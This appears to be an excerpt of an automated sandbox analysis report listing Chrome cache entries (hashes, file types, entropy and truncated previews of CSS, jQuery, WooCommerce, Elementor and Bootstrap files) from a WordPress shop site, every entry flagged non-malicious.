                                                                        MD5:3DFF97245159F2AC73281A5675AAE802
                                                                        SHA1:6EBC82BCDB21084DE875DD19BDAE25879A8102B2
                                                                        SHA-256:32DD257CE6132923E904DE23B47F9B49B280CF69063344192F9A436EF6F95561
                                                                        SHA-512:C2621F0968CC6DC63625E06FC8D566DBE720D2E5F43C2E9B8556E3B0D3EE725DD95B51A876A652C5750E28288C8F39AA8D504BDC2FA301F89E6B9B8DF9CCFF9B
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."....................................................................................f....|].+..i^=...t-.n...]U.. `....<.+.ug..v....e....Uo.....S.v..T......I...*.b..P..8.R..tD...+<n/s...g.s..K.K7i.LGE=..n....N]'X.E...z).b........!...........LCC.................1.@.................4.@....h.....L..........0C.....`...L.d...A.lG&.L..0...L...L.K.B-.I.......)B@6$....Y..Mk..2.FQQ.@.%..FP_......*.@a..Y...G....N..>....=(th..jE4_Ut/..w.q......q<.ks..*.-.2L.t]s...o.'r\.....tZ....}N&Z....g.0l&.jP..~m...`..I..0.,EvF@ UZ.O7......+gr.._.x....U....:.C..B.+=..4I..!....................@..@........................&R..................................(...0....g;......2.1..M......J.D....a.....#@. #:.P..B.l-.@.....G.8L...*.\...(J..3..LPFQ$..,*g.\.AFV....Ng^!N.".

                                                                        Chrome Cache Entry: 325

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (714)
                                                                        Category:downloaded
                                                                        Size (bytes):11295
                                                                        Entropy (8bit):4.737568599002979
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:1053E983F2122BD8B762EC1CBEFB8C84
                                                                        SHA1:A8C212872DAF48C4C0B2A2F3CCD947F52D372F2F
                                                                        SHA-256:77D3C5EA92A8602F15B9648B373782EA2165D24880313A6CF01E0952CCD8FFAD
                                                                        SHA-512:52581B22C2F77D44A0544FED9D0F608938C12F843563D64BF11493B1D4E4ABAE15D48739A66C8916C2F608C78AD55242D7BE1A4E873638ACA1823C902EF83F7F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/themes/ciena/assets/css/body_color.css?ver=1.0.8
                                                                        Preview:body {. color: #6d6d6d;.}...woocommerce form .form-row label, .woocommerce-page form .form-row label {. color: #6d6d6d;.}..#fm-account-modal form.woocommerce-form.woocommerce-form-register .form-row label, #fm-account-modal form.woocommerce-form.woocommerce-form-login .form-row label, .woocommerce-account form.woocommerce-form.woocommerce-form-register .form-row label, .woocommerce-account form.woocommerce-form.woocommerce-form-login .form-row label {. color: #6d6d6d;.}...theme-ciena .fmc-checkout-step .step.finish span.label:not(:hover) {. color: #6d6d6d;.}...woocommerce-form-coupon-toggle .woocommerce-info, .woocommerce-form-login-toggle .woocommerce-info {. color: #6d6d6d;.}...woocommerce-checkout form.woocommerce-form-coupon .form-row-first input.input-text {. color: #6d6d6d;.}...woocommerce-cart .woocommerce-cart-form table.woocommerce-cart-form__contents td dl.variation dd + dt::before {. color: #6d6d6d;.}..woocommerce-cart .woocommerce-cart-form table.woocommerce-cart-for

                                                                        Chrome Cache Entry: 326

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Unicode text, UTF-8 text, with very long lines (8189)
                                                                        Category:downloaded
                                                                        Size (bytes):21464
                                                                        Entropy (8bit):5.303481082929494
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:8FBC22C79D40119DDE9A5D16897002B9
                                                                        SHA1:E9837519ACA724457792E2D5EE98A97A0367CDF9
                                                                        SHA-256:7E84C9F8D71BC6EB2DAC2FCE59A6CAEA62DA51FFA8CF56B41806F59386AB1322
                                                                        SHA-512:3118A198A3710C839C15D6C4B5DC9F9ADCD637913AF2E26F438B01C80B27281F4937E25AAD2817855D8B3EB36207C61AE16D62B17E698799C5316E86F52AC6FC
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.3
                                                                        Preview:/*! jQuery UI - v1.13.3 - 2024-04-26.* https://jqueryui.com.* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effect-explode.js, effects/effect-fade.js, effects/effect-fold.js, effects/effect-highlight.js, effects/effect-puff.js, effects/effect-pulsate.js, effects/effect-scale.js, effects/effect-shake.js, effects/effect-size.js, effects/effect-slide.js, effects/effect-transfer.js, focusable.js, form-reset-mixin.js, jquery-patch.js, keycode.js, labels.js, scroll-parent.js, tabbable.js, unique-id.js, widgets/accordion.js, widgets/autocomplete.js, widgets/button.js, widgets/checkboxradio.js, widgets/controlgroup.js, widgets/datepicker.js, widgets/dialog.js, widgets/draggable.js, widgets/droppable.js, widgets/menu.js, widgets/mouse.js, widgets/progressbar.js, widgets/resizable.js, widgets/selectable.js, widgets/selectmenu.js, widgets/slider.js, widgets/sort

                                                                        Chrome Cache Entry: 327

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):2047
                                                                        Entropy (8bit):4.555981853453777
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:90BFF8B5E70854D873E53E3337349D96
                                                                        SHA1:01726220EBE9E5E3AD06BF0823995B5A6F15C9D7
                                                                        SHA-256:43841FE177E4EEFB459A3CCE0901D9B77E7C224F6FACC264BEF5C2DFD5FB3461
                                                                        SHA-512:47A263A8489D6B13385E39D762E0679397D034C7D036A90061C4B3773C7BAE6B4E67E0A0A8B3725AE0A20CCDF9830F93BE158099EC5DE7092574D78D30AC5BD0
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:"use strict";.function woof_init_mselects() {.. if (woof_select_type == 'chosen') {. jQuery('select.woof_mselect').chosen();. } else if (woof_select_type == 'selectwoo') {. try {. jQuery('select.woof_mselect').selectWoo();. } catch (e) {. console.log(e);. }. }.. jQuery('.woof_mselect').change(function (a) {. var slug = jQuery(this).val();. var name = jQuery(this).attr('name');.. //fix for multiselect if in chosen mode remove options. if (woof_select_type == 'chosen') {. var vals = jQuery(this).chosen().val();. jQuery('.woof_mselect[name=' + name + '] option:selected').removeAttr("selected");. jQuery('.woof_mselect[name=' + name + '] option').each(function (i, option) {. var v = jQuery(this).val();. if (jQuery.inArray(v, vals) !== -1) {. jQuery(this).prop("selected", true);. }. });. }.

                                                                        Chrome Cache Entry: 328

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (42889), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):124272
                                                                        Entropy (8bit):5.552390150563906
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:45158046DA12A8625B17FABCA990D080
                                                                        SHA1:366F30392BDE37BF0EEC5C7DE4EC8BE5498D35E2
                                                                        SHA-256:87664D848161D3A5BF83A511F4F483DC05E8472D06AEDD5111488D267AF298BB
                                                                        SHA-512:88EF1C748B6251A489A3159B9C9A86A301840E70954D92D552D304C12CF3459CD07C609E56BC5E5C23BF87D8775A2EF861B724FE8348378FE0E27D02FFB8C3BE
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(t){var e={};function n(r){if(e[r])return e[r].exports;var i=e[r]={i:r,l:!1,exports:{}};return t[r].call(i.exports,i,i.exports,n),i.l=!0,i.exports}n.m=t,n.c=e,n.d=function(t,e,r){n.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:r})},n.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},n.t=function(t,e){if(1&e&&(t=n(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:t}),2&e&&"string"!=typeof t)for(var i in t)n.d(r,i,function(e){return t[e]}.bind(null,i));return r},n.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return n.d(e,"a",e),e},n.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},n.p="",n(n.s=1)}([function(t,e){t.exports=jQuery},function(t,e,n){n(2),n(6),t.exports=n(4)},function(t,e,n

                                                                        Chrome Cache Entry: 330

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Unicode text, UTF-8 text, with very long lines (1083)
                                                                        Category:dropped
                                                                        Size (bytes):1284
                                                                        Entropy (8bit):5.120305588181906
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:ED130C8D00BA37D0E75E013974D88F75
                                                                        SHA1:366C717C004578EC0AC0D4390021D07114A26125
                                                                        SHA-256:2B48BE97458E30F257FC46FB5E93548F35DD52FC4C91BA441DA504BA89A5C45E
                                                                        SHA-512:877999E20F90FA3E873533E34F7774C28DC499211B7175065FA52B4BC1407CF6AD9DD6AD1236017DA6D0BBB4289333D7AC0E791A41EB8DF4F019107F55D671AC
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:/*!. * jQuery UI Touch Punch 0.2.3. *. * Copyright 2011.2014, Dave Furfero. * Dual licensed under the MIT or GPL Version 2 licenses.. *. * Depends:. * jquery.ui.widget.js. * jquery.ui.mouse.js. */.!function(t){var o,e,u,n;function c(o,t){var e,u;1<o.originalEvent.touches.length||(o.preventDefault(),e=o.originalEvent.changedTouches[0],(u=document.createEvent("MouseEvents")).initMouseEvent(t,!0,!0,window,1,e.screenX,e.screenY,e.clientX,e.clientY,!1,!1,!1,!1,0,null),o.target.dispatchEvent(u))}t.support.touch="ontouchend"in document,t.support.touch&&(o=t.ui.mouse.prototype,e=o._mouseInit,u=o._mouseDestroy,o._touchStart=function(o){!n&&this._mouseCapture(o.originalEvent.changedTouches[0])&&(n=!0,this._touchMoved=!1,c(o,"mouseover"),c(o,"mousemove"),c(o,"mousedown"))},o._touchMove=function(o){n&&(this._touchMoved=!0,c(o,"mousemove"))},o._touchEnd=function(o){n&&(c(o,"mouseup"),c(o,"mouseout"),this._touchMoved||c(o,"click"),n=!1)},o._mouseInit=function(){var o=this;o.element.on({touchstar

                                                                        Chrome Cache Entry: 332

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):60554
                                                                        Entropy (8bit):4.536601709264332
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:592C33238192E558C6BC01AB4897034A
                                                                        SHA1:C99D5C72D4A26C99112BD13CE58416AC461C4C19
                                                                        SHA-256:D510064A15E8A07E28305FE1CBB7BD22BAA01076D25DC14669914727D39A38D7
                                                                        SHA-512:34D273FA0F43DD53A9E7B5984E2DCE1E9544CC239D13A4B6EEA4B82C868F3011566DCAC9AF8C406B3C5968089DB12DEA0F0148C7805B47D658B245844ABC9006
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:"use strict";.var woof_redirect = '';//if we use redirect attribute in shortcode [woof].var woof_reset_btn_action = false;..jQuery(function () {. try. {. woof_current_values = JSON.parse(woof_current_values);. } catch (e). {. woof_current_values = null;. }. if (woof_current_values == null || woof_current_values.length == 0) {. woof_current_values = {};. }..});..//***.if (typeof woof_lang_custom == 'undefined') {. var woof_lang_custom = {};/*!!important*/.}.if (typeof woof_ext_filter_titles != 'undefined') {. woof_lang_custom = Object.assign({}, woof_lang_custom, woof_ext_filter_titles);.}..jQuery(function ($) {. jQuery('body').append('<div id="woof_html_buffer" class="woof_info_popup" style="display: none;"></div>');.//http://stackoverflow.com/questions/2389540/jquery-hasparent. jQuery.extend(jQuery.fn, {. within: function (pSelector) {. // Returns a subset of items using jQuery.filter. return this.filte

                                                                        Chrome Cache Entry: 335

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65324)
                                                                        Category:downloaded
                                                                        Size (bytes):155758
                                                                        Entropy (8bit):5.06621719317054
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:A15C2AC3234AA8F6064EF9C1F7383C37
                                                                        SHA1:6E10354828454898FDA80F55F3DECB347FD9ED21
                                                                        SHA-256:60B19E5DA6A9234FF9220668A5EC1125C157A268513256188EE80F2D2C8D8D36
                                                                        SHA-512:B435CF71A9AE66C59677A3AC285C87EA702A87F32367FE5893CF13E68F9A31FCA0A8D14F6A7D692F23C5027751CE63961CA4FE8D20F35A926FF24AE3EB1D4B30
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/fami-templatekits/assets/vendors/bootstrap/css/bootstrap.min.css?ver=4.3.1
                                                                        Preview:/*!. * Bootstrap v4.3.1 (https://getbootstrap.com/). * Copyright 2011-2019 The Bootstrap Authors. * Copyright 2011-2019 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */:root{--blue:#007bff;--indigo:#6610f2;--purple:#6f42c1;--pink:#e83e8c;--red:#dc3545;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--font-family-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}*,::after,::before{box-sizing:

                                                                        Chrome Cache Entry: 337

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (4921)
                                                                        Category:downloaded
                                                                        Size (bytes):4960
                                                                        Entropy (8bit):5.388907220723694
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E0B0728EF9A032F266A452E8756EED80
                                                                        SHA1:32092AD198ED2496B3DC52A23E8C7C1091B06B84
                                                                        SHA-256:9D02623E246A2E8299B30DA9FFA8AADD8B53CD63DB56A0F1237BE26244D05638
                                                                        SHA-512:0E9A0BB10DBBA6FBE02F4A265373896DA710A2B29B67AAA4A4A66ACA1DBC89011B073F60BBD4DB08532A738CDDEDD0C3797A1B70895F00AD9142CA5478A278DB
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.6.1
                                                                        Preview:/*! elementor - v3.6.1 - 23-03-2022 */.(()=>{"use strict";var e,r,_,t,i,a={},n={};function __webpack_require__(e){var r=n[e];if(void 0!==r)return r.exports;var _=n[e]={exports:{}};return a[e](_,_.exports,__webpack_require__),_.exports}__webpack_require__.m=a,e=[],__webpack_require__.O=(r,_,t,i)=>{if(!_){var a=1/0;for(u=0;u<e.length;u++){for(var[_,t,i]=e[u],n=!0,c=0;c<_.length;c++)(!1&i||a>=i)&&Object.keys(__webpack_require__.O).every((e=>__webpack_require__.O[e](_[c])))?_.splice(c--,1):(n=!1,i<a&&(a=i));if(n){e.splice(u--,1);var o=t();void 0!==o&&(r=o)}}return r}i=i||0;for(var u=e.length;u>0&&e[u-1][2]>i;u--)e[u]=e[u-1];e[u]=[_,t,i]},_=Object.getPrototypeOf?e=>Object.getPrototypeOf(e):e=>e.__proto__,__webpack_require__.t=function(e,t){if(1&t&&(e=this(e)),8&t)return e;if("object"==typeof e&&e){if(4&t&&e.__esModule)return e;if(16&t&&"function"==typeof e.then)return e}var i=Object.create(null);__webpack_require__.r(i);var a={};r=r||[null,_({}),_([]),_(_)];for(var n=2&t&&e;"object"==typeof

                                                                        Chrome Cache Entry: 338

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (19082)
                                                                        Category:downloaded
                                                                        Size (bytes):19128
                                                                        Entropy (8bit):4.5664248896753055
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:50BE31853049E4B4A10C277D5F95EB75
                                                                        SHA1:AC2DFFC0C65AD6B209FEDF2169D0C50EB4119A3E
                                                                        SHA-256:B651D87EF113CBA0C8EC8A33BFDB694171EFFEBA56B20BE12E3C77FC15F6AE9F
                                                                        SHA-512:D4E784C23393F5DEC68871A57EBE42BB7B44112010774602B4A4F97BAAE37C6A40D405F71A624183F2597136141B79E9AC902C4835D34BF09A122978F71F8D4E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5.15.0
                                                                        Preview:/*! elementor-icons - v5.15.0 - 30-01-2022 */.@font-face{font-family:eicons;src:url(../fonts/eicons.eot?5.15.0);src:url(../fonts/eicons.eot?5.15.0#iefix) format("embedded-opentype"),url(../fonts/eicons.woff2?5.15.0) format("woff2"),url(../fonts/eicons.woff?5.15.0) format("woff"),url(../fonts/eicons.ttf?5.15.0) format("truetype"),url(../fonts/eicons.svg?5.15.0#eicon) format("svg");font-weight:400;font-style:normal}[class*=" eicon-"],[class^=eicon]{display:inline-block;font-family:eicons;font-size:inherit;font-weight:400;font-style:normal;font-variant:normal;line-height:1;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}@keyframes a{0%{transform:rotate(0deg)}to{transform:rotate(359deg)}}.eicon-animation-spin{animation:a 2s infinite linear}.eicon-editor-link:before{content:'\e800'}.eicon-editor-unlink:before{content:'\e801'}.eicon-editor-external-link:before{content:'\e802'}.eicon-editor-close:before{content:'\e803'}.eicon-editor-list-ol:before{cont

                                                                        Chrome Cache Entry: 340

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 32 x 32, 8-bit gray+alpha, non-interlaced
                                                                        Category:downloaded
                                                                        Size (bytes):552
                                                                        Entropy (8bit):7.515583549045739
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:1CBA01736A152F08BA1804CCDF26EA7D
                                                                        SHA1:C0DE3FA29D5C4D9C37D767A3C81B1B71E070A26F
                                                                        SHA-256:136E61B06AFF51781F423C992F49229C3DDB882657E18F1603AB3A08D9CAF072
                                                                        SHA-512:C1A2135AF17DF98C1F8ACB232FC2E84D62433DD480F27DE452D0C6376A10D2561829310A2C9883F4E82A4B60AB3B1C708054E1C40BC042835E02D9316BC64599
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/uploads/2021/10/cropped-Progetto-senza-titolo-2021-10-27T000238.589-1-32x32.png
                                                                        Preview:.PNG........IHDR... ... ......s......IDATH...R.Q...$ .................\.....x...66..1.....A...2.OTBl..K046.n.gv.{v.,....u_.<q^F.+..y....A3`......4..jC&...V.^..xj..+y.ze#.W..h.`...0......}.z.=v.&.6..Y...[.k...9...C..Y.......!@...../`.7...X._.].F...V..C.......O....C...).f}.UH....4.:.Zw.*.,..7..M..'.....s_A.v.8`.}....`.*..........{S@:.+Y.}..U......q.6....+p..mpS...&.^e;A.+..o...L..XD..}.iI.e.Ud.Z.C...*'e0n....%..%C./.4s.... .e!2g..!)+oW'."k....T|.Xf..m.Z.0}l...s...t.-E....*.S..l'..5..=.Wq..XU.q... ?.;..z.}......IEND.B`.

                                                                        Chrome Cache Entry: 341

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (771), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):771
                                                                        Entropy (8bit):4.987651578772006
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:2399EF783701F73C399589AE95298B0F
                                                                        SHA1:3E1F2A7AC9DCB2B50B1F1CF768441E46FD9F62EE
                                                                        SHA-256:2DEA57483641F8762937DFD9B09126A9B21C88BD3D7486186003E0BBB9043145
                                                                        SHA-512:50F1C2B16C8C2FC62C504A33529DCEF3FDBDD1533206C8779772CBBA1A336C7C5BBB533A35F99E559ADED3D1BF0C858C10A04EC083969F47A29DEAC92E366FA1
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/wpforms-lite/assets/js/integrations/elementor/frontend.min.js?ver=1.8.9.5
                                                                        Preview:"use strict";var WPFormsElementorFrontend=window.WPFormsElementorFrontend||function(o,e,n){var r={init:function(){r.events()},events:function(){e.addEventListener("elementor/popup/show",function(e){e=n("#elementor-popup-modal-"+e.detail.id).find(".wpforms-form");e.length&&r.initFields(e)})},initFields:function(e){wpforms.ready(),"undefined"!=typeof wpformsModernFileUpload&&wpformsModernFileUpload.init(),"undefined"!=typeof wpformsRecaptchaLoad&&("recaptcha"===wpformsElementorVars.captcha_provider&&"v3"===wpformsElementorVars.recaptcha_type?"undefined"!=typeof grecaptcha&&grecaptcha.ready(wpformsRecaptchaLoad):wpformsRecaptchaLoad()),n(o).trigger("wpforms_elementor_form_fields_initialized",[e])}};return r}(document,window,jQuery);WPFormsElementorFrontend.init();

                                                                        Chrome Cache Entry: 342

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (18984)
                                                                        Category:downloaded
                                                                        Size (bytes):28486
                                                                        Entropy (8bit):6.0827502349938065
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:DDC6D4588CBB41ECB18AD26C232547D1
                                                                        SHA1:919F45F845BA95B8971E9F7771B4214D3936B600
                                                                        SHA-256:E2192D14732DDCF8E8FD4BD7FD44AC69805F3CEAF6A8DE5948BEADCC232A4020
                                                                        SHA-512:FCB10335670197B60A42AE2CC0B774273020C0A6FFB2753B55D7F374ED1E1D1EC7C55DB07BDCE733387C16A9DE627B936EBA7F253D7E912285BC7D085D985EA1
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/show-hidecollapse-expand/assets/css/genericons/genericons.css?ver=6.7.1
                                                                        Preview:/**...Genericons..*/.../* IE8 and below use EOT and allow cross-site embedding. . IE9 uses WOFF which is base64 encoded to allow cross-site embedding.. So unfortunately, IE9 will throw a console error, but it'll still work.. When the font is base64 encoded, cross-site embedding works in Firefox */.@font-face {. font-family: "Genericons";. src: url("./Genericons.eot?") format("embedded-opentype");. font-weight: normal;. font-style: normal;.}..@font-face {. font-family: "Genericons";. src: url("data:application/x-font-woff;charset=utf-8;base64,d09GRgABAAAAADdgAA0AAAAAV4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABGRlRNAAA3RAAAABsAAAAce83cqk9TLzIAAAGgAAAARQAAAGBkLHXFY21hcAAAAogAAACWAAABsqlys6FjdnQgAAADIAAAAAQAAAAEAEQFEWdhc3AAADc8AAAACAAAAAj//wADZ2x5ZgAABFQAAC95AABJYOgXX9doZWFkAAABMAAAADAAAAA2D77/XmhoZWEAAAFgAAAAHQAAACQQuAgGaG10eAAAAegAAACfAAABOFjwU3Jsb2NhAAADJAAAATAAAAEw5FP2dm1heHAAAAGAAAAAIAAAACAA6QEZbmFtZQAAM9AAAAE8AAACOjHf71xwb3N0AAA1DAAAAjAAAAXo9iKXv3jaY2BkYGAA4sUzNS/F89t8ZeDmYACBKwE3

                                                                        Chrome Cache Entry: 343

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (33229)
                                                                        Category:downloaded
                                                                        Size (bytes):33407
                                                                        Entropy (8bit):4.7584710387647835
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E35D9C4EBAEA0573DF8E4A9505B72EEA
                                                                        SHA1:5FBB384CD8CD7A64483E6487D8D8179A633F9954
                                                                        SHA-256:9F29F2BBB25602F4BDBD3122C317244F8FD9741106FFD5A412574B02EE794993
                                                                        SHA-512:C571015753B927017B3BEC2B1C0B0103DE27DCC5E805E1DAF8A1459E0F797ABA38FF0592F93CBEC80B98F574B18455DDBC65A1F38A8AED5ACF14EB8CE2D7265C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://use.fontawesome.com/releases/v5.0.0/css/all.css
                                                                        Preview:/*!. * Font Awesome Free 5.0.0 by @fontawesome - http://fontawesome.com. * License - http://fontawesome.com/license (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */..fa,.fab,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:inline-block;font-style:normal;font-variant:normal;text-rendering:auto;line-height:1}.fa-lg{font-size:1.33333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:.08em solid #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pull-left{float

                                                                        Chrome Cache Entry: 345

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (43353)
                                                                        Category:downloaded
                                                                        Size (bytes):43392
                                                                        Entropy (8bit):5.408544605819908
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:F047DF9A35C9DB95B0BB24A98A863892
                                                                        SHA1:A22FD5F8D8D749CB217E34212668637687B193F1
                                                                        SHA-256:7CE5EBAA76613684B5EBF327FE920F0AC2F7577E8F816E02F108B2B144B3E316
                                                                        SHA-512:189BE8D714AD2473E791B2B94AE8636BECAF3349565095ED705694745D22ADD4EB1C002E123C6DE3633F76E900F4EBD57F0AD82F2130611EC38CB1AF64A30376
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.6.1
                                                                        Preview:/*! elementor - v3.6.1 - 23-03-2022 */.(self.webpackChunkelementor=self.webpackChunkelementor||[]).push([[882,723,209,745,120,192,520,181,791,268,357],{5526:e=>{e.exports=function _defineProperty(e,t,s){return t in e?Object.defineProperty(e,t,{value:s,enumerable:!0,configurable:!0,writable:!0}):e[t]=s,e},e.exports.default=e.exports,e.exports.__esModule=!0},8470:(e,t,s)=>{"use strict";var n=s(7914);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var i=n(s(9728));class Accordion extends i.default{getDefaultSettings(){return{...super.getDefaultSettings(),showTabFn:"slideDown",hideTabFn:"slideUp"}}}t.default=Accordion},9269:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class Alert extends elementorModules.frontend.handlers.Base{getDefaultSettings(){return{selectors:{dismissButton:".elementor-alert-dismiss"}}}getDefaultElements(){const e=this.getSettings("selectors");return{$dismissButton:this.$element.find(e.dismissButton)}}bindEve

                                                                        Chrome Cache Entry: 346

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):3545
                                                                        Entropy (8bit):4.544468898754614
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:7765D912B815D023405044D5A67932C7
                                                                        SHA1:99BB63A7C3BA0BEF83D0D60A0AC5E22FA7543F45
                                                                        SHA-256:EA27ADEFE5FFB2B2306D13DC337D3CDC23031D2816EFA3FA7B4F06A4377EED9D
                                                                        SHA-512:8DF08B3460C18F7761188121B37587C4490E2CAA9D1E1285775548A24EB92083655B534B1A1EFA879FCFD8014E980FC351839DF529A363A744547C5401EB768D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/ext/image/js/html_types/image.js?ver=3.3.0
                                                                        Preview:"use strict";.function woof_init_image() {. //http://jsfiddle.net/jtbowden/xP2Ns/. jQuery('.woof_image_term').each(function () {. var image = jQuery(this).data('image');. var styles = jQuery(this).data('styles');. if (image.length > 0) {. styles += '; background-image: url(' + image + '); ';. } else {. styles += '; background-color: #ffffff;';. }.. var span = jQuery('<span style="' + styles + '" class="' + jQuery(this).attr('type') + ' ' + jQuery(this).attr('class') + '" title=""></span>').on('click',woof_image_do_check).mousedown(woof_image_do_down).mouseup(woof_image_do_up);. if (jQuery(this).is(':checked')) {. span.addClass('checked');. }. jQuery(this).wrap(span).hide();. jQuery(this).after('<span class="woof_image_checked"></span>');//for checking. });.. function woof_image_do_check() {. var is_checked = false;. var radio=false;. if(jQuery(this).pa

                                                                        Chrome Cache Entry: 349

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (9251)
